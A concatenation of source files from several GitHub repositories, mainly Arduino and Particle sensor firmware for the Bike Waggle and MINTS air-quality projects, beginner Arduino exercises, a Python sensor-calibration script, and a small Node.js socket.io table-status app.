Serial.println("Reading Index File Opended");
myFile.println("1");
myFile.close();
Sensorgram_Reading_Index = 1;
}
// Doing the Index for the Publish File
if (sd.exists(Bike_Waggle_ID+"_Sensorgram/Publish_Index.txt"))
{
Serial.println("File Already Exists");
Sensorgram_Publish_Index= atoi(Read_Data_from_SD(Bike_Waggle_ID+"_Sensorgram/Publish_Index.txt"));
} else{
Serial.println("Publish File Does Not Exist");
myFile.open(Bike_Waggle_ID+"_Sensorgram/Publish_Index.txt", O_CREAT | O_WRITE | O_AT_END) ;
Serial.println("Publish Index File Opended");
myFile.println("1");
myFile.close();
Sensorgram_Publish_Index = 1;
}
}
String Read_Data_from_SD(String Path){
// Create a file in Folder1 using a path.
// re-open the file for reading:
myFile = sd.open(Path);
if (myFile) {
Serial.println("Reading:"+Path);
// read from the file until there's nothing else in it:
String Current_Byte;
String Out = "";
while (myFile.available()) {
Current_Byte =(char) myFile.read();
Out.concat(Current_Byte);
}
// close the file:
myFile.close();
return Out;
} else {
// if the file didn't open, print an error:
Serial.println("No Such File");
return "-1";
}
}
void Write_Data_To_SD_Waggle(String Data){
// Create a file in Folder1 using a path.
if (myFile.open(Bike_Waggle_ID+"_Data/Readings.txt", O_CREAT | O_WRITE | O_AT_END)) {
Serial.println("Data File Opended");
myFile.println(Data);
myFile.close();
}else
{
Serial.println("Data File Not Open");
}
}
void Write_Data_To_Sensorgram_Waggle(String Data){
// Create a file in Folder1 using a path.
if (myFile.open(Bike_Waggle_ID+"_Sensorgram/"+Add_Leading_Zeros_8(Sensorgram_Reading_Index)+".txt", O_CREAT | O_WRITE)) {
Serial.println("Sensorgram File Opended");
myFile.print(Data);
myFile.close();
Sensorgram_Reading_Index = Sensorgram_Reading_Index+1;
//
if (myFile.open(Bike_Waggle_ID+"_Sensorgram/Reading_Index.txt", O_CREAT | O_WRITE )){
Serial.println("Sensorgram File Opended");
myFile.print(String(Sensorgram_Reading_Index));
myFile.close();
}
}else
{
Serial.println("Data File Not Open");
}
}
void Publish_Data_To_Cloud_Waggle(){
// Create a file in Folder1 using a path.
String Path =Bike_Waggle_ID+"_Sensorgram/"+Add_Leading_Zeros_8(Sensorgram_Publish_Index)+".txt";
if(Sensorgram_Publish_Index<Sensorgram_Reading_Index)
{
if (sd.exists(Path))
{
String Sensorgram_Str = Read_Data_from_SD(Path);
Serial.println("Sensorgram Read for Publishing");
if(!Sensorgram_Str.equals("-1"))
{
if(Particle.publish("Sensorgram",Sensorgram_Str))
{
Sensorgram_Publish_Index = Sensorgram_Publish_Index+1;
// Remove files from current directory.
sd.remove(Path);
if (myFile.open(Bike_Waggle_ID+"_Sensorgram/Publish_Index.txt", O_CREAT | O_WRITE )){
Serial.println("Publish Index File Opened");
myFile.print(String(Sensorgram_Publish_Index));
myFile.close();
}
}
}
}
}
}
// Take from Conversions
String Add_Leading_Zeros_8(int val){
String Zeros = "00000000" ;
String Val_Str = String(val);
String Final;
if (Val_Str.length()<Zeros.length())
{
Final = Zeros.substring(0,Zeros.length()-Val_Str.length())+Val_Str;
}
else{
Final = Val_Str;
}
return Final;
}
```
## September 27-31
#### Task 27 - Seeking Device Stabilty through the Gyrscope
The Bike Waggle device is meant to impliment a code which seeks the devices stabilty on each implimeted loop. The bike waggle will attemp to publish more data while the device is stable and on the otherhand it will read data more frequently while in motion.
The following code will make use of the Gyrorates read by the Gyroscope to provide devices' stabilty states.
```
// Making this bool to sort oyut whather the Device is stable or not
void Read_MPU9250_BW()
{
if (myIMU.readByte(MPU9250_ADDRESS, INT_STATUS) & 0x01)// Check of the sensor is working
{
MPU9250_Online = true;
myIMU.readAccelData(myIMU.accelCount); // Read the x/y/z adc values
myIMU.getAres();
// Now we'll calculate the accleration value into actual g's
// This depends on scale being set
DateTime nowAcc = rtc.now();
myIMU.ax = (float)myIMU.accelCount[0]*myIMU.aRes; // - accelBias[0];
myIMU.ay = (float)myIMU.accelCount[1]*myIMU.aRes; // - accelBias[1];
myIMU.az = (float)myIMU.accelCount[2]*myIMU.aRes; // - accelBias[2];
myIMU.readGyroData(myIMU.gyroCount); // Read the x/y/z adc values
myIMU.getGres();
// Calculate the gyro value into actual degrees per second
// This depends on scale being set
DateTime nowGyro = rtc.now();
myIMU.gx = (float)myIMU.gyroCount[0]*myIMU.gRes;
myIMU.gy = (float)myIMU.gyroCount[1]*myIMU.gRes;
myIMU.gz = (float)myIMU.gyroCount[2]*myIMU.gRes;
myIMU.readMagData(myIMU.magCount); // Read the x/y/z adc values
myIMU.getMres();
// User environmental x-axis correction in milliGauss, should be
// automatically calculated
myIMU.magbias[0] = +470.;
// User environmental x-axis correction in milliGauss TODO axis??
myIMU.magbias[1] = +120.;
// User environmental x-axis correction in milliGauss
myIMU.magbias[2] = +125.;
// Calculate the magnetometer values in milliGauss
// Include factory calibration per data sheet and user environmental
// corrections
// Get actual magnetometer value, this depends on scale being set
DateTime nowMag = rtc.now();
myIMU.mx = (float)myIMU.magCount[0]*myIMU.mRes*myIMU.magCalibration[0] -
myIMU.magbias[0];
myIMU.my = (float)myIMU.magCount[1]*myIMU.mRes*myIMU.magCalibration[1] -
myIMU.magbias[1];
myIMU.mz = (float)myIMU.magCount[2]*myIMU.mRes*myIMU.magCalibration[2] -
myIMU.magbias[2];
// if (readByte(MPU9250_ADDRESS, INT_STATUS) & 0x01)
// Must be called before updating quaternions!
myIMU.updateTime();
// Sensors x (y)-axis of the accelerometer is aligned with the y (x)-axis of
// the magnetometer; the magnetometer z-axis (+ down) is opposite to z-axis
// (+ up) of accelerometer and gyro! We have to make some allowance for this
// orientationmismatch in feeding the output to the quaternion filter. For the
// MPU-9250, we have chosen a magnetic rotation that keeps the sensor forward
// along the x-axis just like in the LSM9DS0 sensor. This rotation can be
// modified to allow any convenient orientation convention. This is ok by
// aircraft orientation standards! Pass gyro rate as rad/s
// MadgwickQuaternionUpdate(ax, ay, az, gx*PI/180.0f, gy*PI/180.0f, gz*PI/180.0f, my, mx, mz);
MahonyQuaternionUpdate(myIMU.ax, myIMU.ay, myIMU.az, myIMU.gx*DEG_TO_RAD,
myIMU.gy*DEG_TO_RAD, myIMU.gz*DEG_TO_RAD, myIMU.my,
myIMU.mx, myIMU.mz, myIMU.deltat);
myIMU.delt_t = millis() - myIMU.count;
// if (myIMU.delt_t > 500) Make sure to have a delay between sensors
// {
// Print acceleration values in milligs!
float MPU9250AccelerationX = 1000*myIMU.ax;
float MPU9250AccelerationY = 1000*myIMU.ay;
float MPU9250AccelerationZ = 1000*myIMU.az;
float MPU9250GyroRateX = myIMU.gx;
float MPU9250GyroRateY = myIMU.gy;
float MPU9250GyroRateZ = myIMU.gz;
float MPU9250MagFeildX = myIMU.mx;
float MPU9250MagFeildY = myIMU.my;
float MPU9250MagFeildZ = myIMU.mz;
float MPU9250Temprature = (((float) myIMU.tempCount) / 333.87 + 21.0);
MPU9250_Accelaration_X.Pack(Get_Current_Time_HEX(nowAcc),Float_32_to_Hex(&MPU9250AccelerationX),Get_Current_Time_SD(nowAcc),String(MPU9250AccelerationX));
MPU9250_Accelaration_Y.Pack(Get_Current_Time_HEX(nowAcc),Float_32_to_Hex(&MPU9250AccelerationY),Get_Current_Time_SD(nowAcc),String(MPU9250AccelerationY));
MPU9250_Accelaration_Z.Pack(Get_Current_Time_HEX(nowAcc),Float_32_to_Hex(&MPU9250AccelerationZ),Get_Current_Time_SD(nowAcc),String(MPU9250AccelerationZ));
MPU9250_Gyro_Rate_X.Pack(Get_Current_Time_HEX(nowGyro),Float_32_to_Hex(&MPU9250GyroRateX),Get_Current_Time_SD(nowGyro),String(MPU9250GyroRateX));
MPU9250_Gyro_Rate_Y.Pack(Get_Current_Time_HEX(nowGyro),Float_32_to_Hex(&MPU9250GyroRateY),Get_Current_Time_SD(nowGyro),String(MPU9250GyroRateY));
MPU9250_Gyro_Rate_Z.Pack(Get_Current_Time_HEX(nowGyro),Float_32_to_Hex(&MPU9250GyroRateZ),Get_Current_Time_SD(nowGyro),String(MPU9250GyroRateZ));
MPU9250_Magnetic_Feild_X.Pack(Get_Current_Time_HEX(nowMag),Float_32_to_Hex(&MPU9250MagFeildX),Get_Current_Time_SD(nowMag),String(MPU9250MagFeildX));
MPU9250_Magnetic_Feild_Y.Pack(Get_Current_Time_HEX(nowMag),Float_32_to_Hex(&MPU9250MagFeildY),Get_Current_Time_SD(nowMag),String(MPU9250MagFeildY));
MPU9250_Magnetic_Feild_Z.Pack(Get_Current_Time_HEX(nowMag),Float_32_to_Hex(&MPU9250MagFeildZ),Get_Current_Time_SD(nowMag),String(MPU9250MagFeildZ));
MPU9250_Temperature.Pack(Get_Current_Time_HEX(nowMag),Float_32_to_Hex(&MPU9250MagFeildX),Get_Current_Time_SD(nowMag),String(MPU9250MagFeildX));
// Serial.print("X-acceleration: "); Serial.print(1000*myIMU.ax);
// Serial.print(" mg ");
// Serial.print("Y-acceleration: "); Serial.print(1000*myIMU.ay);
// Serial.print(" mg ");
// Serial.print("Z-acceleration: "); Serial.print(1000*myIMU.az);
// Serial.println(" mg ");
// // Print gyro values in degree/sec
// Serial.print("X-gyro rate: "); Serial.print(myIMU.gx, 3);
// Serial.print(" degrees/sec ");
// Serial.print("Y-gyro rate: "); Serial.print(myIMU.gy, 3);
// Serial.print(" degrees/sec ");
// Serial.print("Z-gyro rate: "); Serial.print(myIMU.gz, 3);
// Serial.println(" degrees/sec");
// // Print mag values in degree/sec
// Serial.print("X-mag field: "); Serial.print(myIMU.mx);
// Serial.print(" mG ");
// Serial.print("Y-mag field: "); Serial.print(myIMU.my);
// Serial.print(" mG ");
// Serial.print("Z-mag field: "); Serial.print(myIMU.mz);
// Serial.println(" mG");
// // Print temperature in degrees Centigrade
// Serial.print("Temperature is "); Serial.print(myIMU.temperature, 1);
// Serial.println(" degrees C");
// Define output variables from updated quaternion---these are Tait-Bryan
// angles, commonly used in aircraft orientation. In this coordinate system,
// the positive z-axis is down toward Earth. Yaw is the angle between Sensor
// x-axis and Earth magnetic North (or true North if corrected for local
// declination, looking down on the sensor positive yaw is counterclockwise.
// Pitch is angle between sensor x-axis and Earth ground plane, toward the
// Earth is positive, up toward the sky is negative. Roll is angle between
// sensor y-axis and Earth ground plane, y-axis up is positive roll. These
// arise from the definition of the homogeneous rotation matrix constructed
// from quaternions. Tait-Bryan angles as well as Euler angles are
// non-commutative; that is, the get the correct orientation the rotations
// must be applied in the correct order which for this configuration is yaw,
// pitch, and then roll.
// For more see
// http://en.wikipedia.org/wiki/Conversion_between_quaternions_and_Euler_angles
// which has additional links.
myIMU.yaw = atan2(2.0f * (*(getQ()+1) * *(getQ()+2) + *getQ() *
*(getQ()+3)), *getQ() * *getQ() + *(getQ()+1) * *(getQ()+1)
- *(getQ()+2) * *(getQ()+2) - *(getQ()+3) * *(getQ()+3));
myIMU.pitch = -asin(2.0f * (*(getQ()+1) * *(getQ()+3) - *getQ() *
*(getQ()+2)));
myIMU.roll = atan2(2.0f * (*getQ() * *(getQ()+1) + *(getQ()+2) *
*(getQ()+3)), *getQ() * *getQ() - *(getQ()+1) * *(getQ()+1)
- *(getQ()+2) * *(getQ()+2) + *(getQ()+3) * *(getQ()+3));
myIMU.pitch *= RAD_TO_DEG;
myIMU.yaw *= RAD_TO_DEG;
// Declination of SparkFun Electronics (40°05'26.6"N 105°11'05.9"W) is
// 8° 30' E ± 0° 21' (or 8.5°) on 2016-07-19
// - http://www.ngdc.noaa.gov/geomag-web/#declination
myIMU.yaw -= 8.5;
myIMU.roll *= RAD_TO_DEG;
// Serial.print("Yaw, Pitch, Roll: ");
// Serial.print(myIMU.yaw, 2);
// Serial.print(", ");
// Serial.print(myIMU.pitch, 2);
// Serial.print(", ");
// Serial.println(myIMU.roll, 2);
// Serial.print("rate = ");
// Serial.print((float)myIMU.sumCount/myIMU.sum, 2);
// Serial.println(" Hz");
// Print acceleration values in milligs!
String Euler_Yaw = String(myIMU.yaw, 2);
String Euler_Pitch = String(myIMU.pitch, 2);
String Euler_Roll = String(myIMU.roll, 2);
String Euler_Frequency = String((float)myIMU.sumCount/myIMU.sum, 2);
myIMU.count = millis();
myIMU.sumCount = 0;
myIMU.sum = 0;
Device_Stable = ((pow(MPU9250GyroRateX,2)+pow(MPU9250GyroRateY,2)+pow(MPU9250GyroRateZ,2)<10));// if this is true the device is stable
}else
{
MPU9250_Online = false;
Device_Stable = false;
}
}// Read MPU 9250
```
Further modifications of a unified BikeWaggle implementation was done during the week.
## September 3-7
#### Task 28 - Completion of the Bike Waggle Code - Phase 1
The modules worked on the previuos weeks were put to one unified code. The following [link](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle/firmware) gives the said implimentation.
#### Task 30 -Completion of the Wiring Diagram
In order to complete the PCB for the Bike Waggle(Micro Waggle for bikes) the following Diagram was done.
<img src="https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/Bike-Waggle-Wiring-Layout.svg">
Further modifications to the said diagram can be done through this [link](https://www.digikey.com/schemeit/project/bike-waggle-3-OEFH9F8401JG/).
## September 10-14
#### Task 31 - The Completion of the PCB
The PCB was done using [Eagle](https://www.autodesk.com/products/eagle/overview). The statud design files can be found [here](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle/PCB_Design).
##### The final Bike Waggle PCB
<img src="https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/PCB_Design/Bike_Waggle_PCB_Image.png">
## September 17th -21st
#### Task 32 - Addition of the control elements for the bike waggle.
The bike waggle is a spin off of Waggle Micro waggle architecture. The micro waggle supports several control elements of the nodes. An example code can be found [here](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle/controller).
To make way to such control options the Bikewaggle code was modified. T
The BW surrports the following controller options:
- Enabling and Disabling Sensors.
- Control of timing options in sensing and publishing data
The modified bike waggle code can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/wijeratne/codes/Bike_Waggle_Current/firmware_4/firmware.ino).
<file_sep>#include <Arduino.h>
// #include "Adafruit_Sensor.h"
#include "Seeed_BME280.h"
// #include "MutichannelGasSensor.h"
//
#include "OPCN2NanoMints.h"
#include "jobsMints.h"
#include "devicesMints.h"
#define CS 10
OPCN2NanoMints opc = OPCN2NanoMints(CS);
bool OPCN2Online;
//
bool MGS001Online;
bool BME280Online;
BME280 bme280; // I2C
uint16_t sensingPeriod = 3213;
uint16_t initPeriod = 1500;
void setup() {
delay(initPeriod);
initializeSerialMints();
//
delay(initPeriod);
BME280Online = initializeBME280Mints();
//
delay(initPeriod);
MGS001Online = initializeMGS001Mints();
delay(initPeriod);
OPCN2Online = initializeOPCN2Mints();
// delay(initPeriod);
// SCD30Online = initializeSCD30Mints();
//
// delay(1000);
// INA219Online = initializeINA219Mints();
}
// the loop routine runs over and over again forever:
void loop() {
//
delay(sensingPeriod);
if(BME280Online)
{
readBME280Mints();
}
// //
delay(sensingPeriod);
if(MGS001Online)
{
readMGS001Mints();
}
// //
delay(sensingPeriod);
if(OPCN2Online)
{
readOPCN2Mints();
}
}
<file_sep># Exercises
## Ex1: Create an Arduino Account and log into the Arduino Web IDE:
The IDE can be found [here](https://www.arduino.cc/en/Main/Software)
## Ex2:
- Run the following script for an Arduino Nano on the Arduino Web IDE:
```
/*
# ***************************************************************************
# Summer 2019: Ex2
# ---------------------------------
# Written by: [ADD YOUR NAME]
# - for -
# Mints: Multi-scale Integrated Sensing and Simulation
# ---------------------------------
# Date: June 25th, 2019
# ---------------------------------
# [SAY SOMETHING ABOUT THE SKETCH]
# --------------------------------------------------------------------------
# https://github.com/mi3nts
# http://utdmints.info/
# ***************************************************************************
*/
// the setup routine runs once when you press reset:
void setup() {
// initialize serial communication at 9600 bits per second:
Serial.begin(9600);
}
// the loop routine runs over and over again forever:
void loop() {
// print out a String of your choice
Serial.println("Hello MINTS: Multi-scale Integrated Sensing and Simulation");
// Delay for 1000 miliseconds
delay(1000); // delay in between reads for stability
}
```
- Check Whats printed out on the serial monitor:
## Ex3: Run the following script for an Arduino Nano on the Arduino Web IDE:
```
/*
# ***************************************************************************
# Summer 2019: Ex3
# ---------------------------------
# Written by: [ADD YOUR NAME]
# - for -
# Mints: Multi-scale Integrated Sensing and Simulation
# ---------------------------------
# Date: June 25th, 2019
# ---------------------------------
# [SAY SOMETHING ABOUT THE SKETCH]
# --------------------------------------------------------------------------
# https://github.com/mi3nts
# http://utdmints.info/
# ***************************************************************************
*/
void setup() {
// initialize digital pin LED_BUILTIN as an output.
pinMode(LED_BUILTIN, OUTPUT);
}
// the loop function runs over and over again forever
void loop() {
digitalWrite(LED_BUILTIN, HIGH); // turn the LED on (HIGH is the voltage level)
delay(1000); // wait for a second
digitalWrite(LED_BUILTIN, LOW); // turn the LED off by making the voltage LOW
delay(1000); // wait for a second
}
```
- Change the Delay Times and see how the Arduino responds:
## Ex4: Download and install Arduino Desktop IDE:
The IDE can be found [here](https://www.arduino.cc/en/Main/Software)
## Ex5: Do Exercise 2 and 3 on the Desktop IDE
## EX6: Download And Install Atom Desktop IDE
- The Atom Desktop IDE can be found [here](https://atom.io/)
## Ex7: Install PlatformIO within Atom
- This [link](https://platformio.org/install/ide?install=atom) gives you installation details
## EX8: Install the following Libraries on PlatformIO and run the relevent scripts given:
- Seeed_BME280.h
```
#include "Seeed_BME280.h"
#include <Wire.h>
BME280 bme280;
void setup()
{
Serial.begin(9600);
if(!bme280.init()){
Serial.println("Device error!");
}
}
void loop()
{
float pressure;
//get and print temperatures
Serial.print("Temp: ");
Serial.print(bme280.getTemperature());
Serial.println("C");//The unit for Celsius because original arduino don't support speical symbols
//get and print atmospheric pressure data
Serial.print("Pressure: ");
Serial.print(pressure = bme280.getPressure());
Serial.println("Pa");
//get and print altitude data
Serial.print("Altitude: ");
Serial.print(bme280.calcAltitude(pressure));
Serial.println("m");
//get and print humidity data
Serial.print("Humidity: ");
Serial.print(bme280.getHumidity());
Serial.println("%");
delay(1000);
}
```
<file_sep># Image Procssing Tutorial
## Display the png named '0001.png' using python
cd open
cv2.imshow('0001.png', img)
<file_sep>/*
Adapted From example code
Displays RGBC data
*/
#include <Wire.h>
#include "Seeed_TMG3993.h"
TMG3993 sensor;
void setup()
{
Serial.begin(9600);
Serial.println("TMG3993 Proximity and RGBC");
Wire.begin();
if (sensor.initialize() == false)
{
Serial.println("Check wiring");
while (1);
}
sensor.setADCIntegrationTime(0xdb);
sensor.enableEngines(ENABLE_PON | ENABLE_AEN | ENABLE_AIEN);
}
void loop()
{
if (sensor.getSTATUS() & STATUS_AVALID)
{
int r,g,b,c;
int lux, cct;
sensor.getRGBCRaw(&r, &g, &b, &c); // Pass pointers as arguments since we want to overwrite those values
lux = sensor.getLux(r, g, b, c);
cct = sensor.getCCT(r, g, b, c);
Serial.print("R: ");
Serial.print(r);
Serial.print("\tG: ");
Serial.print(g);
Serial.print("\tB: ");
Serial.print(b);
Serial.print("\tC: ");
Serial.println(c);
Serial.print("Lux: ");
Serial.print(lux);
Serial.print("\tCCT: ");
Serial.println(cct);
Serial.println("----");
sensor.clearALSInterrupts();
}
delay(1000);
}
<file_sep># /* mi3nts
# Written by: <NAME>
# - for -
# Lakitha's exercise
# Date: July 29th, 2019
# Atom
# Github
# Python */
import numpy as np
import cv2
# Load an color image in grayscale
img = cv2.imread('seal.jpg')
print(img.shape)
green = img[100,100,1]
blue = img[100,100,0]
red = img[100,100,2]
cv2.imshow('green',green)
cv2.imshow('red',red)
cv2.imshow('blue',blue)
cv2.waitKey(0)
cv2.destroyAllWindows()
# import matplotlib.pyplot as plt
# plt.imshow([[0, 0, 0],
# [1, 1, 1],
# [2, 2, 2],],)
# plt.colorbar()
# plt.show()
<file_sep>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 9 10:55:50 2019
@author: s243476
"""
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import linear_model
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
# load dataset
data = pd.read_csv("../downloads/calibrate.csv")
data.shape
data = data.iloc[:, 1:]
def normalize(col):
maxVal = col.max()
minVal = col.max()
avgVal = (maxVal + minVal)/2
interval = (maxVal - minVal)/2
return (col-avgVal)/interval
# clean dataset
# remove null values if any
data[data.isnull()] = 0
col = data.head()
for i in list(col):
data["C4H10_loRa"] = normalize(data["C4H10_loRa"])
plt.figure(0)
plt.hist(data["C4H10_loRa"])
#data["C4H10_loRa"] = data["C4H10_loRa"]/1000
#data["NO2_loRa"] = (data["NO2_loRa"]-4.5)*2
#data["CH4_loRa"] = (data["CH4_loRa"]-500)/200
#data["H2_loRa"] = (data["H2_loRa"]-900)/30
#data["P1_lpo_loRa"] = (data["P1_lpo_loRa"])/100000
#data["P1_conc_loRa"] = (data["P1_conc_loRa"])/500
#data["P2_lpo_loRa"] = (data["P2_lpo_loRa"])/100000
#data["P2_conc_loRa"] = (data["P2_conc_loRa"]-500)/500
#data["Temperature_loRa"] = (data["Temperature_loRa"]-22)/10
#data["Pressure_loRa"] = (data["Pressure_loRa"]-98868)/50
#data["Humidity_loRa"] = (data["Humidity_loRa"]-40)/40
#data["Humidity_loRa"] = (data["Humidity_loRa"]-40)/40
# split into training and test sets
# predict quality of wine
train, test = train_test_split(data, test_size=.2)
train_in = train.loc[:, "NH3_loRa":"Humidity_loRa"]
train_out = train.loc[:, "pm10_grimm":"alveolic_grimm"]
train_in[train_in > 5] = 5
train_in[train_in < -5] = -5
test_in = test.loc[:, "NH3_loRa":"Humidity_loRa"]
test_out = test.loc[:, "pm10_grimm":"alveolic_grimm"]
test_in[test_in > 5] = 5
test_in[test_in < -5] = -5
reg=linear_model.LinearRegression().fit(train_in, train_out)
lr_pred = reg.predict(test_in)
lr_train_pred = reg.predict(train_in)
plt.figure(1)
plt.xlabel("pm10_grimm")
plt.ylabel("prediction")
print(lr_pred.shape)
x = test_out["pm10_grimm"]
y = lr_pred[:, 0]
plt.plot(train_out["pm10_grimm"], lr_train_pred[:, 0], 'ro')
plt.plot(x, y, 'bo')
print("Linear reg error ", mean_squared_error(lr_pred, test_out))
# create model = > neural network
# use test set to predict values
from sklearn.neural_network import MLPRegressor
nn = MLPRegressor(hidden_layer_sizes=(4, 4), activation='relu', solver='lbfgs', alpha=0.001,
batch_size=30, max_iter=5000, tol=0.005, verbose=False)
nn.fit(train_in, train_out)
nn_pred = nn.predict(test_in)
nn_train_pred = nn.predict(train_in)
plt.figure(2)
plt.xlabel("pm10_grimm")
plt.ylabel("prediction")
x = test_out["pm10_grimm"]
y = nn_pred[:, 0]
plt.plot(train_out["pm10_grimm"], nn_train_pred[:, 0], 'ro')
plt.plot(x, y, 'bo')
print("Neural Network error ", mean_squared_error(nn_pred, test_out))
# Random Forest
from sklearn.ensemble import RandomForestRegressor
regr = RandomForestRegressor(max_depth=10, random_state=0, n_estimators=100)
regr.fit(train_in, train_out)
print(regr.feature_importances_)
rf_pred = regr.predict(test_in)
rf_train_pred = regr.predict(train_in)
plt.figure(3)
plt.xlabel("pm10_grimm")
plt.ylabel("prediction")
x = test_out["pm10_grimm"]
y = rf_pred[:, 0]
plt.plot(train_out["pm10_grimm"], rf_train_pred[:, 0], 'ro')
plt.plot(x, y, 'bo')
print("Random Forest error ", mean_squared_error(rf_pred, test_out))
<file_sep>#include "jobsMints.h"
void initializeSerialMints(){
Serial.begin(9600);
Serial.println("Serial Port Open");
}
//
// void initializeSerialUSBMints(){
// SerialUSB.begin(9600);
// Serial.println("SerialUSB Port Open");
// }
void sensorPrintMints(String sensor,String readings[],uint8_t numOfvals){
Serial.print("#mintsO!");Serial.print(sensor);Serial.print(">");
for (int i = 0; i < numOfvals; ++i)
{
Serial.print(readings[i]);Serial.print(":");
}
Serial.print("~");
}
// Native Command
// void serialEvent() {
// while (Serial.available()) {
// // get the new byte:
// char inChar = (char)Serial.read();
// // add it to the inputString:
//
// inputString += inChar;
// // if the incoming character is a newline, set a flag so the main loop can
// // do something about it:
// if (inChar == '-') {
// stringComplete = true;
// }
// }
// }
//
//
//
// void commandReadMints(){
// // Serial.println("inside");
// if (stringComplete) {
// Serial.println(inputString);
// sendCommand2DevicesMints(inputString);
//
// // clear the string:
// inputString = "";
// stringComplete = false;
// }
// }
//
// void sendCommand2DevicesMints(String command){
//
// if (command.startsWith("mints:")) {
// printInput("Recieving Mints Command");
//
// if (command.startsWith("HTU21D",6)) {
// readHTU21DMints();
// }
//
// if (command.startsWith("BMP280",6)) {
// readBMP280Mints();
// // SerialUSB.println(year());
// }
//
// if (command.startsWith("time",6)) {
// setTimeMints(command.substring(11));
//
// }
//
// }
// }
//
// String int2StringMints(int inputNumber){
//
// return String::format("%04d:%02d:%02d:%02d:%02d:%02d",inputNumber);
//
// }
<file_sep>#ifndef DEVICES_MINTS_H
#define DEVICES_MINTS_H
//
#include <Arduino.h>
// #include "Adafruit_Sensor.h"
#include "Seeed_BME280.h"
#include "MutichannelGasSensor.h"
#include "OPCN2NanoMints.h"
#include "jobsMints.h"
// #include <Adafruit_INA219.h>
// #include "SparkFun_SCD30_Arduino_Library.h"
// void sendCommand2DevicesMints(String command);
//
// void setTimeMints(String command);
// void printTimeMints();
// void printTimeOnlyMints();
//
// extern bool serialOut;
//
extern BME280 bme280;
bool initializeBME280Mints();
void readBME280Mints();
//
bool initializeMGS001Mints();
void readMGS001Mints();
//
// extern SCD30 scd;
// bool initializeSCD30Mints();
// void readSCD30Mints();
//
extern OPCN2NanoMints opc;
bool initializeOPCN2Mints();
void readOPCN2Mints();
// extern Adafruit_INA219 ina;
// bool initializeINA219Mints();
// void readINA219Mints();
// void printInput(String command);
// void sensorPrintMints(String sensor,String readigs[],uint8_t numOfvals);
#endif
<file_sep>/*
Written by <NAME>.
Displays Temperature in Celsius, Pressure in Pascals, Altitude in Meters, and Humidity.
Measurement Interval is 1 second.
*/
#include <Wire.h>
#include "Seeed_BME280.h"
BME280 sensor;
void setup() {
Wire.begin();
Serial.begin(9600);
Serial.println("BME280 Temperature, Pressure, Altitude, and Humidity");
if (!sensor.init()) {
Serial.print("Error with sensor");
}
}
void loop() {
Serial.print("Temperature: ");
Serial.print(sensor.getTemperature());
Serial.print(" C\nPressure: ");
Serial.print(sensor.getPressure());
Serial.print(" Pa");
Serial.print("\nAltitude: ");
Serial.print(sensor.calcAltitude(sensor.getPressure()));
Serial.print("m \nHumidity: ");
Serial.print(sensor.getHumidity());
Serial.print("% \n --- \n");
delay(1000);
}
| 76fc131bef2170f0ddd3cee5cda41b3412688422 | [
"Markdown",
"C",
"Python",
"C++"
] | 23 | Python | mi3nts/summer2019 | 60c500c91f82feb907d4aa733f6062ac456bbc92 | 7042956969b113f526baacdf126bd7a9981d14c8 |
refs/heads/master | <repo_name>elvis460/table_system<file_sep>/app.js
// MEAN Stack RESTful API Tutorial - Contact List App
var express = require('express');
var app = express();
var http = require('http').Server(app);
var io = require('socket.io')(http);
var helmet = require('helmet');
var session = require('express-session');
var bodyParser=require('body-parser');
var fs = require('fs');
var secret=require('./secret.js')
var jwt = require('jsonwebtoken');
var socketioJwt = require('socketio-jwt');
var condA,condB,condC;
var numOnline=0;
var expireInMinute=24*60;
var loginData={
aaa:"AAA",
bbb:"BBB",
ccc:"CCC"
}
// var mongojs = require('mongojs');
// var db = mongojs('contactlist', ['contactlist']);
//var bodyParser = require('body-parser');
//app.set('env', 'production');
app.use(helmet());
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
app.use(session({
secret: secret.sessionSecret,
cookie: {
maxAge: expireInMinute*60*1000,
httpOnly: true
//domain: 'table.mgr.ddns.net'
},
resave: true,
saveUninitialized: true
}));
app.post('/api/login', function (req, res,next) {
//console.log("receive request");
if(req.session.token){ //has logined, send token back
res.json({success:"true",token: req.session.token});
}
else if(req.body.account==undefined||req.body.passwd==undefined){
res.type("json");
res.json({success:"false"});
}
else if(loginData[req.body.account]===req.body.passwd){ //login successfully
var profile = {
account: req.body.account
};
var token = jwt.sign(profile, secret.sessionSecret, { expiresInMinutes: expireInMinute });
req.session.token=token;
res.type("json");
res.json({success:"true",token:token});
}
else{
res.type("json");
res.json({success:"false"});
}
});
app.use(express.static(__dirname + '/public'));
app.use(function(req, res, next) {
var err = new Error('Not Found');
err.status = 404;
next(err);
});
if (app.get('env') === 'development') {
app.use(function(err, req, res, next) {
res.status(err.status || 500);
res.render('error', {
message: err.message,
error: err
});
});
}
//
// // production error handler
// // no stacktraces leaked to user
else{
app.use(function(err, req, res, next) {
res.status(err.status || 500);
res.send('<H1 style=margin-left:50%>404 Not Found</H1>');
});
}
//app.use(bodyParser.json());
io.set('authorization', socketioJwt.authorize({
secret: secret.sessionSecret,
handshake: true
}));
io.on('connection', function(socket){
console.log(socket.handshake);
//console.log(socket.handshake.decoded_token.account, 'connected');
console.log("sign in");
socket.on('disconnect',function(socket){
io.emit('updateOnline',io.engine.clientsCount);
});
socket.on("recv_updateA", function(msg){
io.emit('updateA',msg);
condA=msg;
});
socket.on("recv_updateB", function(msg){
io.emit('updateB', { status: msg });
condB=msg;
});
socket.on("recv_updateC", function(msg){
io.emit('updateC', { status: msg });
condC=msg;
});
socket.on('new_connt',function(msg){
numOnline++;
socket.emit('updateA',condA);
socket.emit('updateB',condB);
socket.emit('updateC',condC);
io.emit('updateOnline',io.engine.clientsCount);
});
socket.on('reset',function(msg){
condA={};
condB={};
condC={};
});
});
http.listen(3000, function(){
console.log('listening on *:3000');
});
| e4966e793c70454ebec6e54e1d1ba641cac03ef9 | [
"JavaScript"
] | 1 | JavaScript | elvis460/table_system | e97de839a5fd9b32e897849c47cfc9330e3295e1 | 1ca8b0fffa374b86347466e37f6359f65ca83096 |
refs/heads/master | <repo_name>icerock/paypal_form_and_ipn<file_sep>/README.md
# paypal_form_and_ipn
just a paypal buynow form with button and working IPN page
